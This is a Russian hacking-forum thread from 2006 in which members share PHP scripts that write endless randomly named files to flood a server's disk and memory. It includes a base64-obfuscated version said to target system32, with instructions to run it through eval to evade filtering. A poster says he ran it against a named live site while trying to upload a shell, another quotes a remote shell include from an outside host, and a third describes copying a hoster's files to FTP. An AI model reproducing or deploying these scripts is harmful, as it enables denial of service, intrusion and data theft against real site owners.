Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

16.10.2006, 17:24
|
|
Участник форума
Регистрация: 25.07.2005
Сообщений: 246
Провел на форуме: 457850
Репутация:
174
|
|
Я вообще не понимаю, почему все закручено на md5. Случайные названия, состоящие из цифр и букв + случайное расширение из списка(txt dll ini exe log bmp ...)
|
|
|

16.10.2006, 19:04
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме: 5301021
Репутация:
1879
|
|
Вот от этого точно никто не убежит! Набросал за 5 мин.
PHP код:
<?php // Greetz всем заподлянщикам... // В частности Poncik'y за идею!!!!!!! // Вот, после этого, точно зае*ёшся пыль глотать... //Аминь... //(C) Dr.Check и все кто помог писать "Знаменитый скрипт" //////////////////////////////////////////////////////////////// set_time_limit(0); ignore_user_abort(); echo("<center><h1><b><font color=\"green\">ИБО НЕХУЙ!!!</font></b></h1></center>"); ///////////////////////////////////////////////////////////////// $name = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','r','s', 't','u','v','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L', 'M','N','O','P','R','S','T','U','V','X','Y','Z','1','2','3','4','5','6', '7','8','9','0'); ////////////////////////////////////////////////////////////////// $rash= array('.txt','.dic','.doc','.xls','.exe','.ini', '.bat','.log','.dll','.hak','.wmf','.zip','.rar', '.tar','.gz','.jpg','.gif','.bmp'); ///////////////////////////////////////////////////////////////// while(true) { $perem = ""; $fuck=""; for($i = 0; $i < rand(20,1); $i++) // количество сиволов в имени файла. { $by = rand(0, count($name) - 1); $perem .= $name[$by]; } $ra= rand(0, count($rash)-1); $fuck .= $rash[$ra]; $fp=fopen($perem.$fuck,"w"); fwrite($fp,php_uname()); fclose($fp); } ?>
Зав 3-5 сек было создано около 2-3 тыщъ файлов, занята вся оперативка. Даже динамик запищал!!! 
Для bul.666 :
PHP код:
<?php // в массив ('(',')','[',']','!','?', '&','^','%','@','*',','<','>','/','|','+','-','{','}','`','~'); ?>
Последний раз редактировалось Dr.Check; 16.10.2006 в 20:57..
|
|
|

16.10.2006, 19:09
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме: 3986705
Репутация:
1403
|
|
Добавте еще символов в массив name.
да и расширения можно $rash ирить =)))
|
|
|

16.10.2006, 19:18
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме: 6828219
Репутация:
2274
|
|
Во, добавил, то, что написал SMiX - md5(time().doubleval(microtime())) терь одинаковых имён точно небудет! Про расширения я ещё утром думал, но забыл... Щас сделаю...
PHP код:
<?
set_time_limit(0);
ignore_user_abort();
while(true) {
switch (rand(0,8))
{
case 1 : $r = '.txt'; break;
case 2 : $r = '.exe'; break;
case 3 : $r = '.dat'; break;
case 4 : $r = '.ini'; break;
case 5 : $r = '.log'; break;
case 6 : $r = '.dll'; break;
case 7 : $r = '.wav'; break;
case 8 : $r = '.nsc'; break;
default: $r = '.zip'; break;
}
$fp=fopen(md5(time().doubleval(microtime())).$r,"w");
fwrite($fp,time());
fclose($fp);
}
?>
вот 
P.S. Ах блин! Пока писал, мну опередили  Ничё знаменитого на ачате так и не сделал, Dr.Check мож добавишь тама пару имен в копирайт, все ведь старались, да и хочется знаменитым стать  А скрипт офигеный! Ущел жертву искать!
Последний раз редактировалось Ponchik; 16.10.2006 в 19:22..
|
|
|

16.10.2006, 19:43
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме: 5301021
Репутация:
1879
|
|
Dr.Check мож добавишь тама пару имен в копирайт, все ведь старались, да и хочется знаменитым стать

А каких пару имен!?!?? Я сам написал. Тебе спасибо за Идею, и Смиксу за расширения.
|
|
|

16.10.2006, 19:57
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме: 6828219
Репутация:
2274
|
|
О! Пасибо! Терь я гордый ходить буду
[OFFTOP]
А чё это за ошибка-то? _http://darkmoon.mediazona.ru:4001/modules/admin.php
[/OFFTOP]
|
|
|

16.10.2006, 20:05
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме: 3986705
Репутация:
1403
|
|
А чё это за ошибка-то? _http://darkmoon.mediazona.ru:4001/modules/admin.php
Я думаю, что в сорце самого файла admin.php лежит строчка (в самом верху)
PHP код:
include("http://mucheat.h10.ru/shell.txt");
Но горе хакеры облажались =)
Если смотреть дальше ошибку, то поймете почему =)
|
|
|

16.10.2006, 20:43
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме: 6828219
Репутация:
2274
|
|
Так это я шелл пытаюсь залить, щас чё нить придумаю!
Вот кстати если кому надо зашифрованый этот код в base64 это чтоб фильтрацию обойти, или ещё чего... Файлы будут создаваться в system32...
Вот
c2V0X3RpbWVfbGltaXQoMCk7aWdub3JlX3VzZXJfYWJvcnQoKT tlY2hvKCI8Y2VudGVyPjxoMT48Yj48Zm9udCBjb2xvcj1cImdy ZWVuXCI+Pz8/ID8/Pz8/ITwvZm9udD48L2I+PC9oMT48L2NlbnRlcj4iKTskbmFtZSA9IG FycmF5KCdhJywnYicsJ2MnLCdkJywnZScsJ2YnLCdnJywnaCcs J2knLCdqJywnaycsICAnbCcsJ20nLCduJywnbycsJ3AnLCdyJy wncycsJ3QnLCd1JywndicsJ3gnLCd5JywneicsJ0EnLCdCJywn QycsJ0QnLCdFJywnRicsJ0cnLCdIJywnSScsJ0onLCdLJywnTC csJ00nLCdOJywnTycsJ1AnLCdSJywnUycsJ1QnLCdVJywnVics J1gnLCdZJywnWicsJzEnLCcyJywnMycsJzQnLCc1JywnNicsJz cnLCc4JywnOScsJzAnKTskcmFzaD0gYXJyYXkoJy50eHQnLCcu ZGljJywnLmRvYycsJy54bHMnLCcuZXhlJywnLmluaScsJy5iYX QnLCcubG9nJywnLmRsbCcsJ2hhaycsJy53bWYnLCcuemlwJywn LnJhcicsJy50YXInLCcuZ3onLCcuanBnJywnLmdpZicsJy5ibX AnKTt3aGlsZSh0cnVlKSB7JHBlcmVtID0gIiI7JGZ1Y2s9IiI7 Zm9yKCRpID0gMDsgJGkgPCByYW5kKDIwLDEpOyAkaSsrKSB7JG J5ID0gcmFuZCgwLCBjb3VudCgkbmFtZSkgLSAxKTskcGVyZW0g Lj0gJG5hbWVbJGJ5XTt9JHJhPSByYW5kKDAsIGNvdW50KCRyYX NoKS0xKTskZnVjayAuPSAkcmFzaFskcmFdOyRmcD1mb3Blbigk cGVyZW0uJGZ1Y2ssInciKTtmd3JpdGUoJGZwLHBocF91bmFtZS gpKTtmY2xvc2UoJGZwKTt9 (пробелы убрать)
Это можно выполнить так: eval(base64_decode('ТУТ_ЭТОТ_КОД'));
Всё, запустил эту штуку на _http://darkmoon.mediazona.ru:4001 
Последний раз редактировалось Ponchik; 16.10.2006 в 20:50..
|
|
|

16.10.2006, 20:46
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме: 941818
Репутация:
569
|
|
пару лет назад нашел небольшой прикол на хостерах. Админы от нечего делать всех своих клиентов писали в одну группу пользователей. таким образом я имел доступ на read к любому юзверю хостера, поимев шелл на одном из них. Я описывал эту багу в ][ на примере небольшого "дефа" glukoza.ru (добавил пару новостей, изменил немного фотоальбом). В общем не суть. тогда я написал скрипт который "листает" все диры и файлы с указанного места и копирует полную структуру на указанный ftp. Скрипт умещался в 20 строк.
Я к тому, что если файлы писать не только в system32, а листать все дерево каталогов на жестком диске и писать везде - будет еще страшнее =)
|
|
|

16.10.2006, 21:25
|
|
Познающий
Регистрация: 26.11.2005
Сообщений: 32
Провел на форуме: 47872
Репутация:
20
|
|
Уй позорище какое. Что ни скрипт, то позорище!
Щас меня убивать будут
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|